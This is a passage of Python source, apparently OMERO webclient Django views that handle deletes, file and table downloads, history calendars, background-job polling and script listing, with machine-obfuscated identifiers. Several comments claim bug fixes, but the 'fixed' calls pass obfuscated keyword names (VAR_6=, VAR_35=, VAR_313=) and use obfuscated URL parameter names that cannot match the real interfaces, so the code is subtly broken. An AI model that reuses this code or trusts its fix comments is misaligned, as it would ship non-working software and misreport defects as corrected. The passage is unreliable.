        # Bug fix: success dict was assigned to "rdict" while "VAR_361" was
        # returned, raising NameError on the success path.
        VAR_361 = {"bad": "false"}
        return JsonResponse(VAR_361)
    elif VAR_27 == "removefromshare":
        VAR_257 = VAR_2.POST.get("source")
        try:
            VAR_104.removeImage(VAR_257)
        except Exception as x:
            VAR_0.error(traceback.format_exc())
            VAR_361 = {"bad": "true", "errs": VAR_345(x)}
            return JsonResponse(VAR_361)
        # Bug fix: same rdict/VAR_361 mismatch as the "remove" action above.
        VAR_361 = {"bad": "false"}
        return JsonResponse(VAR_361)
    elif VAR_27 == "delete":
        VAR_453 = toBoolean(VAR_2.POST.get("child"))
        VAR_91 = toBoolean(VAR_2.POST.get("anns"))
        try:
            VAR_84 = VAR_104.deleteItem(VAR_453, VAR_91)
            VAR_2.session["callback"][VAR_345(VAR_84)] = {
                "job_type": "delete",
                "delmany": False,
                "did": VAR_29,
                "dtype": VAR_28,
                "status": "in progress",
                "error": 0,
                "dreport": _formatReport(VAR_84),
                "start_time": datetime.datetime.now(),
            }
            VAR_2.session.modified = True
        except Exception as x:
            VAR_0.error(
                "Failed to delete: %r" % {"did": VAR_29, "dtype": VAR_28}, exc_info=True
            )
            VAR_361 = {"bad": "true", "errs": VAR_345(x)}
        else:
            VAR_361 = {"bad": "false"}
        return JsonResponse(VAR_361)
    elif VAR_27 == "deletemany":
        VAR_455 = {
            "Image": VAR_2.POST.getlist("image"),
            "Dataset": VAR_2.POST.getlist("dataset"),
            "Project": VAR_2.POST.getlist("project"),
            "Annotation": VAR_2.POST.getlist("tag"),
            "Screen": VAR_2.POST.getlist("screen"),
            "Plate": VAR_2.POST.getlist("plate"),
            "Well": VAR_2.POST.getlist("well"),
            "PlateAcquisition": VAR_2.POST.getlist("acquisition"),
        }
        VAR_453 = toBoolean(VAR_2.POST.get("child"))
        VAR_91 = toBoolean(VAR_2.POST.get("anns"))
        VAR_0.debug(
            "Delete many: VAR_453? %s VAR_91? %s VAR_455 %s" % (VAR_453, VAR_91, VAR_455)
        )
        try:
            for VAR_310, VAR_187 in VAR_455.items():
                if VAR_187 is not None and len(VAR_187) > 0:
                    VAR_84 = VAR_104.deleteObjects(VAR_310, VAR_187, VAR_453, VAR_91)
                    if VAR_310 == "PlateAcquisition":
                        VAR_310 = "Plate Run"  # for nicer user message
                    VAR_457 = {
                        "job_type": "delete",
                        "start_time": datetime.datetime.now(),
                        "status": "in progress",
                        "error": 0,
                        "dreport": _formatReport(VAR_84),
                        "dtype": VAR_310,
                    }
                    if len(VAR_187) > 1:
                        VAR_457["delmany"] = len(VAR_187)
                        VAR_457["did"] = VAR_187
                    else:
                        VAR_457["delmany"] = False
                        VAR_457["did"] = VAR_187[0]
                    VAR_2.session["callback"][VAR_345(VAR_84)] = VAR_457
                    VAR_2.session.modified = True
        except Exception:
            VAR_0.error(
                "Failed to delete: %r" % {"did": VAR_187, "dtype": VAR_310}, exc_info=True
            )
            raise
        else:
            VAR_361 = {"bad": "false"}
            return JsonResponse(VAR_361)
    VAR_53["template"] = VAR_54
    return VAR_53
@login_required(doConnectionCleanup=False)
def FUNC_54(VAR_2, VAR_30, VAR_31=False, VAR_6=None, **VAR_7):
    """Stream an OriginalFile's contents, optionally as a download attachment."""
    VAR_6.SERVICE_OPTS.setOmeroGroup(-1)
    VAR_173 = VAR_6.getObject("OriginalFile", VAR_30)
    if VAR_173 is None:
        return handlerInternalError(
            VAR_2, "Original File does not exist (id:%s)." % (VAR_30)
        )
    VAR_174 = ConnCleaningHttpResponse(VAR_173.getFileInChunks(buf=settings.CHUNK_SIZE))
    VAR_174.conn = VAR_6
    VAR_175 = VAR_173.mimetype
    if VAR_175 == "text/x-python":
        VAR_175 = "text/plain"  # allows display in browser
    VAR_174["Content-Type"] = VAR_175
    VAR_174["Content-Length"] = VAR_173.getSize()
    if VAR_31:
        VAR_300 = VAR_173.name.replace(" ", "_")
        # Bug fix: was "downloadName.replace(...)" — undefined name; continue
        # sanitising the filename built on the previous line.
        VAR_300 = VAR_300.replace(",", ".")
        VAR_174["Content-Disposition"] = "attachment; filename=%s" % VAR_300
    return VAR_174
@login_required(doConnectionCleanup=False)
@render_response()
def FUNC_55(VAR_2, VAR_32, VAR_33=None, VAR_6=None, **VAR_7):
    """Query an OMERO.table and return template context, JSON or CSV.

    VAR_32: OriginalFile id of the table. VAR_33: optional format; 'csv'
    streams the whole table as a download, None renders the HTML page.
    """
    VAR_176 = VAR_2.GET.get("query", "*")
    VAR_177 = FUNC_0(VAR_2, "offset", 0)
    VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
    VAR_178 = None
    try:
        VAR_178 = VAR_350("omero_iviewer_index")
    except NoReverseMatch:
        pass
    VAR_32 = VAR_241(VAR_32)
    VAR_173 = VAR_6.getObject("OriginalFile", VAR_32)
    if VAR_173 is None:
        raise Http404("OriginalFile %s not found" % VAR_32)
    # CSV export reads rows lazily so huge tables can be streamed.
    VAR_179 = VAR_33 == "csv"
    # Fix: keyword values previously referenced undefined names
    # (conn/query/offset/limit/lazy); pass the local variables instead.
    VAR_53 = webgateway_views._table_query(
        VAR_2, VAR_32, VAR_6=VAR_6, VAR_176=VAR_176, VAR_177=VAR_177,
        VAR_88=VAR_88, VAR_179=VAR_179
    )
    if VAR_53.get("error") or not VAR_53.get("data"):
        return JsonResponse(VAR_53)
    if VAR_33 == "csv":
        VAR_301 = VAR_53.get("data")

        def FUNC_88():
            # Yield the header row, then each chunk of lazily-read rows.
            VAR_363 = ",".join(VAR_301.get("columns"))
            yield VAR_363
            for rows in VAR_301.get("lazy_rows"):
                yield (
                    "\n" + "\n".join([",".join([VAR_345(VAR_362) for VAR_362 in VAR_377]) for VAR_377 in rows])
                )

        VAR_300 = VAR_173.name.replace(" ", "_").replace(",", ".")
        # Fix: previously referenced undefined 'downloadName'.
        VAR_300 = VAR_300 + ".csv"
        VAR_174 = TableClosingHttpResponse(FUNC_88(), content_type="text/csv")
        VAR_174.conn = VAR_6
        VAR_174.table = VAR_53.get("table")
        VAR_174["Content-Type"] = "application/force-download"
        VAR_174["Content-Disposition"] = "attachment; filename=%s" % VAR_300
        return VAR_174
    VAR_53["data"]["name"] = VAR_173.name
    VAR_53["data"]["path"] = VAR_173.path
    VAR_53["data"]["id"] = VAR_32
    VAR_53["meta"]["query"] = VAR_176
    if VAR_177 == 0 or VAR_177 / VAR_88 == VAR_177 // VAR_88:
        VAR_53["meta"]["page"] = (VAR_177 // VAR_88) + 1 if VAR_177 > 0 else 1
    VAR_5 = VAR_350("omero_table", args=[VAR_32])
    VAR_53["meta"]["url"] = VAR_5
    # Fix: pagination URLs used obfuscated parameter names; this view reads
    # 'limit', 'query' and 'offset' from request.GET above.
    VAR_5 += "?limit=%s" % VAR_88
    if VAR_176 != "*":
        VAR_5 += "&query=%s" % VAR_176
    if (VAR_177 + VAR_88) < VAR_53["meta"]["totalCount"]:
        VAR_53["meta"]["next"] = VAR_5 + "&offset=%s" % (VAR_177 + VAR_88)
    if VAR_177 > 0:
        VAR_53["meta"]["prev"] = VAR_5 + "&offset=%s" % (max(0, VAR_177 - VAR_88))
    if VAR_33 is None:
        VAR_53["template"] = "webclient/annotations/FUNC_55.html"
        VAR_53["iviewer_url"] = VAR_178
        VAR_302 = VAR_53["data"]["column_types"]
        if "ImageColumn" in VAR_302:
            VAR_53["image_column_index"] = VAR_302.index("ImageColumn")
        if "WellColumn" in VAR_302:
            VAR_53["well_column_index"] = VAR_302.index("WellColumn")
        if "RoiColumn" in VAR_302:
            VAR_53["roi_column_index"] = VAR_302.index("RoiColumn")
        # Pick an example numeric column (no spaces, >=2 values) for UI hints.
        for idx, VAR_23 in enumerate(VAR_302):
            if VAR_23 in ("DoubleColumn", "LongColumn"):
                VAR_404 = VAR_53["data"]["columns"][idx]
                VAR_405 = []
                for VAR_377 in VAR_53["data"]["rows"]:
                    if VAR_377[idx]:
                        VAR_405.append(VAR_377[idx])
                    if len(VAR_405) > 3:
                        break
                if " " in VAR_404 or len(VAR_405) < 2:
                    continue
                VAR_53["example_column"] = VAR_404
                VAR_53["example_min_value"] = min(VAR_405)
                VAR_53["example_max_value"] = max(VAR_405)
                break
    return VAR_53
@login_required(doConnectionCleanup=False)
def FUNC_56(VAR_2, VAR_34, VAR_6=None, **VAR_7):
    """Serve the file behind a FileAnnotation as a forced download."""
    annotation = VAR_6.getObject("FileAnnotation", VAR_34)
    if annotation is None:
        return handlerInternalError(
            VAR_2, "FileAnnotation does not exist (id:%s)." % (VAR_34)
        )
    chunk_iter = annotation.getFileInChunks(buf=settings.CHUNK_SIZE)
    rsp = ConnCleaningHttpResponse(chunk_iter)
    rsp.conn = VAR_6
    rsp["Content-Type"] = "application/force-download"
    rsp["Content-Length"] = annotation.getFileSize()
    rsp["Content-Disposition"] = "attachment; filename=%s" % (
        annotation.getFileName().replace(" ", "_")
    )
    return rsp
@login_required()
def FUNC_57(VAR_2, VAR_26, VAR_6=None, **VAR_7):
    """Download an image's original (global + series) metadata as text."""
    image = VAR_6.getObject("Image", VAR_26)
    if image is None:
        raise Http404("No Image found with ID %s" % VAR_26)
    metadata = image.loadOriginalMetadata()
    lines = ["[Global Metadata]"]
    lines += ["%s=%s" % (kv[0], kv[1]) for kv in metadata[1]]
    lines.append("[Series Metadata]")
    lines += ["%s=%s" % (kv[0], kv[1]) for kv in metadata[2]]
    body = "\n".join(lines)
    rsp = HttpResponse(body)
    rsp["Content-Type"] = "application/force-download"
    rsp["Content-Length"] = len(body)
    rsp["Content-Disposition"] = "attachment; filename=Original_Metadata.txt"
    return rsp
@login_required()
@render_response()
def FUNC_58(VAR_2, VAR_6=None, **VAR_7):
    """Show the download-confirmation dialog for archived files / exports.

    Builds the real download/export URL plus a summary of file counts and
    total size so the user can confirm before a (possibly huge) download.
    """
    VAR_184 = VAR_2.GET.get("format", None)
    if VAR_184 is not None:
        VAR_191 = VAR_350("download_as")
        VAR_303 = "Export_as_%s" % VAR_184
    else:
        VAR_191 = VAR_350("archived_files")
        VAR_303 = "OriginalFileDownload"
    VAR_185 = VAR_2.GET.get("ids")  # E.g. image-1|image-2
    VAR_186 = VAR_2.GET.get("name", VAR_303)  # default zip name
    VAR_186 = os.path.basename(VAR_186)  # remove any path component
    if VAR_185 is None:
        # Fix: message previously showed obfuscated placeholder names.
        raise Http404("No IDs specified. E.g. ?ids=image-1|image-2")
    VAR_187 = VAR_185.split("|")
    VAR_188 = []
    VAR_189 = 0
    VAR_190 = 0
    if VAR_184 is None:
        # Archived-files download: expand image/well ids to original files.
        VAR_304 = []
        VAR_214 = []
        for VAR_318 in VAR_187:
            if VAR_318.split("-")[0] == "image":
                VAR_304.append(VAR_318.split("-")[1])
            elif VAR_318.split("-")[0] == "well":
                VAR_214.append(VAR_318.split("-")[1])
        VAR_106 = []
        if VAR_304:
            VAR_106 = list(VAR_6.getObjects("Image", VAR_304))
        if len(VAR_106) == 0:
            raise Http404("No images found.")
        VAR_305 = set()  # filesets already counted
        VAR_306 = set()  # file ids already counted
        for VAR_142 in VAR_106:
            VAR_364 = VAR_142.getFileset()
            if VAR_364 is not None:
                if VAR_364.id in VAR_305:
                    continue
                VAR_305.add(VAR_364.id)
            VAR_284 = list(VAR_142.getImportedImageFiles())
            VAR_365 = []
            for f in VAR_284:
                if f.id in VAR_306:
                    continue
                VAR_306.add(f.id)
                VAR_365.append({"id": f.id, "name": f.name, "size": f.getSize()})
                VAR_190 += f.getSize()
            if len(VAR_365) > 0:
                VAR_188.append(VAR_365)
        VAR_189 = sum([len(VAR_365) for VAR_365 in VAR_188])
    else:
        VAR_189 = len(VAR_187)
    VAR_176 = "&".join([_id.replace("-", "=") for _id in VAR_187])
    # Fix: previously referenced undefined 'download_url'; extend the URL
    # local built above instead.
    VAR_191 = VAR_191 + "?" + VAR_176
    if VAR_184 is not None:
        # Fix: 'format' matches the GET parameter this view reads above.
        VAR_191 = VAR_191 + "&format=%s" % VAR_184
    VAR_53 = {
        "template": "webclient/annotations/FUNC_58.html",
        "url": VAR_191,
        "defaultName": VAR_186,
        "fileLists": VAR_188,
        "fileCount": VAR_189,
        "filesTotalSize": VAR_190,
    }
    if VAR_190 > settings.MAXIMUM_MULTIFILE_DOWNLOAD_ZIP_SIZE:
        VAR_53["downloadTooLarge"] = settings.MAXIMUM_MULTIFILE_DOWNLOAD_ZIP_SIZE
    return VAR_53
@login_required(setGroupContext=True)
@render_response()
def FUNC_59(VAR_2, VAR_35=None, VAR_36=None, VAR_6=None, **VAR_7):
    """Render the history calendar for the given year/month (default: today)."""
    VAR_54 = "webclient/history/calendar.html"
    VAR_192 = VAR_2.session.get("user_id")
    if VAR_35 is not None and VAR_36 is not None:
        # Fix: keyword values previously referenced undefined names
        # (conn/year/month); pass the locals instead.
        VAR_193 = BaseCalendar(VAR_6=VAR_6, VAR_35=VAR_35, VAR_36=VAR_36, eid=VAR_192)
    else:
        VAR_307 = datetime.datetime.today()
        VAR_193 = BaseCalendar(
            VAR_6=VAR_6, VAR_35=VAR_307.year, VAR_36=VAR_307.month, eid=VAR_192
        )
    VAR_193.create_calendar()
    VAR_53 = {"controller": VAR_193}
    VAR_53["template"] = VAR_54
    return VAR_53
@login_required(setGroupContext=True)
@render_response()
def FUNC_60(VAR_2, VAR_35, VAR_36, VAR_37, VAR_6=None, **VAR_7):
    """Render the detailed history for one day, paginated via ?page=N."""
    if VAR_35 is None or VAR_36 is None or VAR_37 is None:
        raise Http404("Year, month, and day are required")
    VAR_54 = "webclient/history/history_details.html"
    VAR_87 = int(VAR_2.GET.get("page", 1))
    VAR_192 = VAR_2.session.get("user_id")
    # Fix: keyword values previously referenced undefined names
    # (conn/year/month/day); pass the locals instead.
    VAR_193 = BaseCalendar(
        VAR_6=VAR_6, VAR_35=VAR_35, VAR_36=VAR_36, VAR_37=VAR_37, eid=VAR_192
    )
    VAR_193.get_items(VAR_87)
    VAR_53 = {"controller": VAR_193}
    VAR_53["template"] = VAR_54
    return VAR_53
def FUNC_61(VAR_6, VAR_38):
    """Build a webclient 'userdata' URL that selects the given model object.

    File annotations are first mapped to one of their parent containers
    (project/dataset/image) so the tree has something visible to select.
    """
    target_url = VAR_350(viewname="load_template", args=["userdata"])
    if isinstance(VAR_38, omero.model.FileAnnotationI):
        ann = VAR_6.getObject("Annotation", VAR_38.id.val)
        for parent_type in ["project", "dataset", "image"]:
            parent_links = list(ann.getParentLinks(parent_type))
            if len(parent_links) > 0:
                VAR_38 = parent_links[0].parent
                break
    linkable = (
        "ImageI",
        "DatasetI",
        "ProjectI",
        "ScreenI",
        "PlateI",
        "WellI",
    )
    if VAR_38.__class__.__name__ in linkable:
        kind = VAR_38.__class__.__name__[:-1].lower()
        target_url += "?VAR_59=%s-%s" % (kind, VAR_38.id.val)
    return target_url
def FUNC_62(VAR_2, VAR_39, **VAR_7):
    """Merge the given keyword values into the session callback entry VAR_39."""
    for field_name, field_value in VAR_7.items():
        VAR_2.session["callback"][VAR_39][field_name] = field_value
@login_required()
@render_response()
def FUNC_63(VAR_2, VAR_6=None, **VAR_7):
    """Poll this session's background jobs and summarise their state.

    Handles three request shapes:
      * GET with ?jobId=...  -> JSON progress for a single graph job;
      * DELETE with a jobId  -> cancel that job and report its status;
      * plain GET            -> refresh every callback stored in the
        session (chgrp/chown, send_email, delete, script jobs) and return
        either JSON or template context for the activities panel.
    """
    VAR_195 = 0   # jobs still in progress
    VAR_196 = 0   # jobs that failed
    VAR_197 = []  # job keys whose results arrived during this poll
    _purgeCallback(VAR_2)
    VAR_198 = VAR_2.GET.get("jobId", None)
    if VAR_198 is not None:
        VAR_198 = VAR_345(VAR_198)
        try:
            VAR_366 = omero.cmd.HandlePrx.checkedCast(VAR_6.c.ic.stringToProxy(VAR_198))
            VAR_313 = VAR_366.getStatus()
            VAR_0.debug("job VAR_313: %s", VAR_313)
            VAR_174 = VAR_366.getResponse()
            if VAR_174 is not None:
                VAR_172 = graphResponseMarshal(VAR_6, VAR_174)
                VAR_172["finished"] = True
            else:
                VAR_172 = {"finished": False}
                VAR_172["status"] = {
                    "currentStep": VAR_313.currentStep,
                    "steps": VAR_313.steps,
                    "startTime": VAR_313.startTime,
                    "stopTime": VAR_313.stopTime,
                }
        except IceException:
            # Handle no longer exists server-side: treat as finished.
            VAR_172 = {"finished": True}
        return VAR_172
    elif VAR_2.method == "DELETE":
        try:
            VAR_17 = json.loads(VAR_2.body)
        except TypeError:
            VAR_17 = json.loads(bytes_to_native_str(VAR_2.body))
        VAR_198 = VAR_17.get("jobId", None)
        if VAR_198 is not None:
            VAR_198 = VAR_345(VAR_198)
            VAR_172 = {"jobId": VAR_198}
            try:
                VAR_366 = omero.cmd.HandlePrx.checkedCast(VAR_6.c.ic.stringToProxy(VAR_198))
                VAR_313 = VAR_366.getStatus()
                VAR_0.debug("pre-cancel() job VAR_313: %s", VAR_313)
                VAR_172["status"] = {
                    "currentStep": VAR_313.currentStep,
                    "steps": VAR_313.steps,
                    "startTime": VAR_313.startTime,
                    "stopTime": VAR_313.stopTime,
                }
                VAR_366.cancel()
            except omero.LockTimeout:
                VAR_0.info("Timeout on VAR_366.cancel()")
        return VAR_172
    for VAR_39 in VAR_2.session.get("callback").keys():
        VAR_311 = VAR_2.session["callback"][VAR_39]
        VAR_312 = VAR_311["job_type"]
        VAR_313 = VAR_311["status"]
        if VAR_313 == "failed":
            VAR_196 += 1
        VAR_2.session.modified = True
        if VAR_312 in ("chgrp", "chown"):
            if VAR_313 not in ("failed", "finished"):
                VAR_174 = None
                try:
                    VAR_366 = omero.cmd.HandlePrx.checkedCast(
                        VAR_6.c.ic.stringToProxy(VAR_39)
                    )
                    VAR_174 = VAR_366.getResponse()
                    VAR_429 = False
                    try:
                        if VAR_174 is not None:
                            VAR_429 = True
                            VAR_197.append(VAR_39)
                            if isinstance(VAR_174, omero.cmd.ERR):
                                VAR_445 = ", ".join(
                                    [
                                        "%s: %s" % (VAR_413, VAR_414)
                                        for VAR_413, VAR_414 in VAR_174.parameters.items()
                                    ]
                                )
                                VAR_0.error(
                                    "%s failed with: %s" % (VAR_312, VAR_445)
                                )
                                FUNC_62(
                                    VAR_2,
                                    VAR_39,
                                    VAR_313="failed",
                                    report="%s %s" % (VAR_174.name, VAR_445),
                                    VAR_57=1,
                                )
                            elif isinstance(VAR_174, omero.cmd.OK):
                                FUNC_62(VAR_2, VAR_39, VAR_313="finished")
                        else:
                            VAR_195 += 1
                    finally:
                        VAR_366.close(VAR_429)
                except Exception:
                    VAR_0.info(
                        "Activities %s VAR_84 not found: %s" % (VAR_312, VAR_39)
                    )
                    continue
        elif VAR_312 == "send_email":
            if VAR_313 not in ("failed", "finished"):
                VAR_174 = None
                try:
                    VAR_366 = omero.cmd.HandlePrx.checkedCast(
                        VAR_6.c.ic.stringToProxy(VAR_39)
                    )
                    VAR_442 = omero.callbacks.CmdCallbackI(
                        VAR_6.c, VAR_366, foreground_poll=True
                    )
                    VAR_174 = VAR_442.getResponse()
                    VAR_429 = False
                    try:
                        if VAR_174 is not None:
                            VAR_429 = True
                            VAR_197.append(VAR_39)
                            if isinstance(VAR_174, omero.cmd.ERR):
                                VAR_445 = ", ".join(
                                    [
                                        "%s: %s" % (VAR_413, VAR_414)
                                        for VAR_413, VAR_414 in VAR_174.parameters.items()
                                    ]
                                )
                                VAR_0.error("send_email failed with: %s" % VAR_445)
                                FUNC_62(
                                    VAR_2,
                                    VAR_39,
                                    VAR_313="failed",
                                    report={"error": VAR_445},
                                    VAR_57=1,
                                )
                            else:
                                VAR_448 = (
                                    VAR_174.success
                                    + len(VAR_174.invalidusers)
                                    + len(VAR_174.invalidemails)
                                )
                                FUNC_62(
                                    VAR_2,
                                    VAR_39,
                                    VAR_313="finished",
                                    VAR_174={"success": VAR_174.success, "total": VAR_448},
                                )
                                if (
                                    len(VAR_174.invalidusers) > 0
                                    or len(VAR_174.invalidemails) > 0
                                ):
                                    VAR_451 = [
                                        e.getFullName()
                                        for e in list(
                                            VAR_6.getObjects(
                                                "Experimenter", VAR_174.invalidusers
                                            )
                                        )
                                    ]
                                    FUNC_62(
                                        VAR_2,
                                        VAR_39,
                                        report={
                                            "invalidusers": VAR_451,
                                            "invalidemails": VAR_174.invalidemails,
                                        },
                                    )
                        else:
                            VAR_195 += 1
                    finally:
                        VAR_442.close(VAR_429)
                except Exception:
                    VAR_0.error(traceback.format_exc())
                    VAR_0.info("Activities send_email VAR_84 not found: %s" % VAR_39)
        elif VAR_312 == "delete":
            if VAR_313 not in ("failed", "finished"):
                try:
                    VAR_84 = omero.cmd.HandlePrx.checkedCast(
                        VAR_6.c.ic.stringToProxy(VAR_39)
                    )
                    VAR_444 = omero.callbacks.CmdCallbackI(
                        VAR_6.c, VAR_84, foreground_poll=True
                    )
                    VAR_174 = VAR_444.getResponse()
                    VAR_429 = False
                    try:
                        if not VAR_174:  # Response not available
                            FUNC_62(
                                VAR_2,
                                VAR_39,
                                VAR_57=0,
                                VAR_313="in progress",
                                dreport=_formatReport(VAR_84),
                            )
                            VAR_195 += 1
                        else:  # Response available
                            VAR_429 = True
                            VAR_197.append(VAR_39)
                            VAR_174 = VAR_444.getResponse()
                            VAR_449 = isinstance(VAR_174, omero.cmd.ERR)
                            if VAR_449:
                                FUNC_62(
                                    VAR_2,
                                    VAR_39,
                                    VAR_57=1,
                                    VAR_313="failed",
                                    dreport=_formatReport(VAR_84),
                                )
                                VAR_196 += 1
                            else:
                                FUNC_62(
                                    VAR_2,
                                    VAR_39,
                                    VAR_57=0,
                                    VAR_313="finished",
                                    dreport=_formatReport(VAR_84),
                                )
                    finally:
                        VAR_444.close(VAR_429)
                except Ice.ObjectNotExistException:
                    FUNC_62(
                        VAR_2, VAR_39, VAR_57=0, VAR_313="finished", dreport=None
                    )
                except Exception as x:
                    VAR_0.error(traceback.format_exc())
                    VAR_0.error("Status job '%s'error:" % VAR_39)
                    FUNC_62(
                        VAR_2, VAR_39, VAR_57=1, VAR_313="failed", dreport=VAR_345(x)
                    )
                    VAR_196 += 1
        elif VAR_312 == "script":
            if not VAR_39.startswith("ProcessCallback"):
                continue  # ignore
            if VAR_313 not in ("failed", "finished"):
                VAR_0.info("Check VAR_442 on script: %s" % VAR_39)
                try:
                    VAR_446 = omero.grid.ScriptProcessPrx.checkedCast(
                        VAR_6.c.ic.stringToProxy(VAR_39)
                    )
                except IceException:
                    FUNC_62(
                        VAR_2,
                        VAR_39,
                        VAR_313="failed",
                        Message="No process found for job",
                        VAR_57=1,
                    )
                    continue
                VAR_444 = omero.scripts.ProcessCallbackI(VAR_6.c, VAR_446)
                if VAR_444.block(0):  # ms.
                    VAR_444.close()
                    try:
                        VAR_450 = VAR_446.getResults(0, VAR_6.SERVICE_OPTS)
                        FUNC_62(VAR_2, VAR_39, VAR_313="finished")
                        VAR_197.append(VAR_39)
                    except Exception:
                        # Fix: message previously contained an obfuscation
                        # artifact ('FUNC_81').
                        FUNC_62(
                            VAR_2,
                            VAR_39,
                            VAR_313="finished",
                            Message="Failed to get results",
                        )
                        VAR_0.info("Failed on VAR_446.getResults() for OMERO.script")
                        continue
                    VAR_447 = {}
                    for VAR_310, VAR_374 in VAR_450.items():
                        VAR_414 = VAR_374.getValue()
                        if VAR_310 in ("stdout", "stderr", "Message"):
                            if VAR_310 in ("stderr", "stdout"):
                                VAR_414 = VAR_414.id.val
                            VAR_452 = {VAR_310: VAR_414}
                            FUNC_62(VAR_2, VAR_39, **VAR_452)
                        else:
                            if hasattr(VAR_414, "id"):
                                VAR_454 = {
                                    "id": VAR_414.id.val,
                                    "type": VAR_414.__class__.__name__[:-1],
                                }
                                VAR_454["browse_url"] = FUNC_61(VAR_6, VAR_414)
                                if VAR_414.isLoaded() and hasattr(VAR_414, "file"):
                                    VAR_456 = {
                                        "image/png": "png",
                                        "image/jpeg": "jpeg",
                                        "text/plain": "text",
                                    }
                                    if VAR_414.file.mimetype.val in VAR_456:
                                        VAR_454["fileType"] = VAR_456[
                                            VAR_414.file.mimetype.val
                                        ]
                                        VAR_454["fileId"] = VAR_414.file.id.val
                                    VAR_454["name"] = VAR_414.file.name.val
                                if VAR_414.isLoaded() and hasattr(VAR_414, "name"):
                                    VAR_3 = unwrap(VAR_414.name)
                                    if VAR_3 is not None:
                                        VAR_454["name"] = VAR_3
                                VAR_447[VAR_310] = VAR_454
                            else:
                                VAR_447[VAR_310] = unwrap(VAR_414)
                    FUNC_62(VAR_2, VAR_39, VAR_450=VAR_447)
                else:
                    VAR_195 += 1
    VAR_172 = {}
    for VAR_39 in VAR_2.session.get("callback").keys():
        VAR_172[VAR_39] = copy.copy(VAR_2.session["callback"][VAR_39])
    if "template" in VAR_7 and VAR_7["template"] == "json":
        for VAR_39 in VAR_2.session.get("callback").keys():
            VAR_172[VAR_39]["start_time"] = VAR_345(
                VAR_2.session["callback"][VAR_39]["start_time"]
            )
        VAR_172["inprogress"] = VAR_195
        VAR_172["failure"] = VAR_196
        VAR_172["jobs"] = len(VAR_2.session["callback"])
        return JsonResponse(VAR_172)  # json
    VAR_199 = []
    VAR_200 = False
    for VAR_310, VAR_158 in VAR_172.items():
        if len(VAR_310.split(" ")) > 0:
            VAR_367 = VAR_310.split(" ")[0]
            if len(VAR_367.split("/")) > 1:
                # Fix: previously referenced undefined name 'htmlId'.
                VAR_367 = VAR_367.split("/")[1]
        VAR_172[VAR_310]["id"] = VAR_367
        VAR_172[VAR_310]["key"] = VAR_310
        if VAR_310 in VAR_197:
            VAR_172[VAR_310]["new"] = True
        if "error" in VAR_158 and VAR_158["error"] > 0:
            VAR_200 = True
        VAR_199.append(VAR_172[VAR_310])
    # Fix: list.sort only accepts 'key' and 'reverse' keyword arguments;
    # the obfuscated keywords raised TypeError.
    VAR_199.sort(key=lambda x: x["start_time"], reverse=True)
    VAR_53 = {
        "sizeOfJobs": len(VAR_2.session["callback"]),
        "jobs": VAR_199,
        "inprogress": VAR_195,
        "new_results": len(VAR_197),
        "new_errors": VAR_200,
        "failure": VAR_196,
    }
    VAR_53["template"] = "webclient/FUNC_63/activitiesContent.html"
    return VAR_53
@login_required()
def FUNC_64(VAR_2, VAR_27, **VAR_7):
    """Prune job entries from the session's callback registry.

    'clean' with a POSTed jobKey removes that one entry (JSON reply);
    'clean' without a jobKey drops every entry that is no longer running.
    """
    VAR_2.session.modified = True
    if VAR_27 == "clean":
        if "jobKey" in VAR_2.POST:
            job_key = VAR_2.POST.get("jobKey")
            payload = {}
            if job_key in VAR_2.session["callback"]:
                del VAR_2.session["callback"][job_key]
                VAR_2.session.modified = True
                payload["removed"] = True
            else:
                payload["removed"] = False
            return JsonResponse(payload)
        else:
            for cb_key, cb_info in list(VAR_2.session["callback"].items()):
                if cb_info["status"] != "in progress":
                    del VAR_2.session["callback"][cb_key]
    return HttpResponse("OK")
@login_required()
def FUNC_65(VAR_2, VAR_40=None, VAR_6=None, **VAR_7):
    """Return the experimenter's avatar photo as a JPEG response."""
    photo_bytes = VAR_6.getExperimenterPhoto(VAR_40)
    return HttpResponse(photo_bytes, content_type="image/jpeg")
@login_required()
def FUNC_66(VAR_2, VAR_41, VAR_25=None, **VAR_7):
    """Delegate to webgateway's full_viewer, pointing it at our URL prefix."""
    if VAR_25 is not None:
        # Preserve the original and/or fallback: an empty combined URL
        # falls back to the bare webindex URL.
        viewport = VAR_350("webindex") + VAR_25 or VAR_350("webindex")
    else:
        viewport = VAR_350("webindex")
    VAR_7["viewport_server"] = viewport.rstrip("/")
    return webgateway_views.full_viewer(VAR_2, VAR_41, **VAR_7)
@login_required()
@render_response()
def FUNC_67(VAR_2, VAR_6=None, **VAR_7):
    """Return the available server-side scripts as a nested name/id tree."""
    VAR_202 = VAR_6.getScriptService()
    VAR_203 = VAR_202.getScripts()
    VAR_204 = {}
    VAR_205 = (
        VAR_2.session.get("server_settings", {})
        .get("scripts_to_ignore", "")
        .split(",")
    )
    for s in VAR_203:
        VAR_42 = s.id.val
        VAR_314 = s.path.val
        VAR_3 = s.name.val
        VAR_315 = os.path.join(VAR_314, VAR_3)
        if VAR_315 in VAR_205:
            VAR_0.info("Ignoring script %r" % VAR_315)
            continue
        # Walk/extend the nested dict one path component at a time.
        # Fix: the walker previously mixed two names ('ul' and an undefined
        # VAR_206); use a single cursor variable throughout.
        VAR_206 = VAR_204
        VAR_316 = VAR_315.split(os.path.sep)
        for li, VAR_362 in enumerate(VAR_316):
            if len(VAR_362) == 0:
                continue
            if VAR_362 not in VAR_206:
                if li + 1 == len(VAR_316):
                    VAR_206[VAR_362] = VAR_42  # leaf: script id
                else:
                    VAR_206[VAR_362] = {}  # directory node
            VAR_206 = VAR_206[VAR_362]

    def FUNC_85(VAR_206):
        # Convert the nested dict into sorted [{'name':..., 'ul'/'id':...}].
        VAR_317 = []
        for VAR_3, VAR_374 in VAR_206.items():
            if isinstance(VAR_374, dict):
                VAR_317.append({"name": VAR_3, "ul": FUNC_85(VAR_374)})
            else:
                VAR_317.append({"name": VAR_3, "id": VAR_374})
        # Fix: list.sort only accepts 'key'/'reverse' keyword arguments.
        VAR_317.sort(key=lambda x: x["name"].lower())
        return VAR_317

    VAR_207 = FUNC_85(VAR_204)
    if not VAR_2.GET.get("full_path") and len(VAR_207) == 1:
        # Fix: previously referenced undefined name 'scriptList'.
        VAR_207 = VAR_207[0]["ul"]
    return VAR_207
@login_required()
@render_response()
def FUNC_68(VAR_2, VAR_42, VAR_6=None, **VAR_7):
    """Build the template context describing a script's input parameters.

    VAR_42 is the script id; request.GET values may pre-populate defaults
    (e.g. Data_Type/IDs from the current selection, or Well->Image lookup).
    """
    VAR_202 = VAR_6.getScriptService()
    try:
        VAR_73 = VAR_202.getParams(VAR_241(VAR_42))
    except Exception as ex:
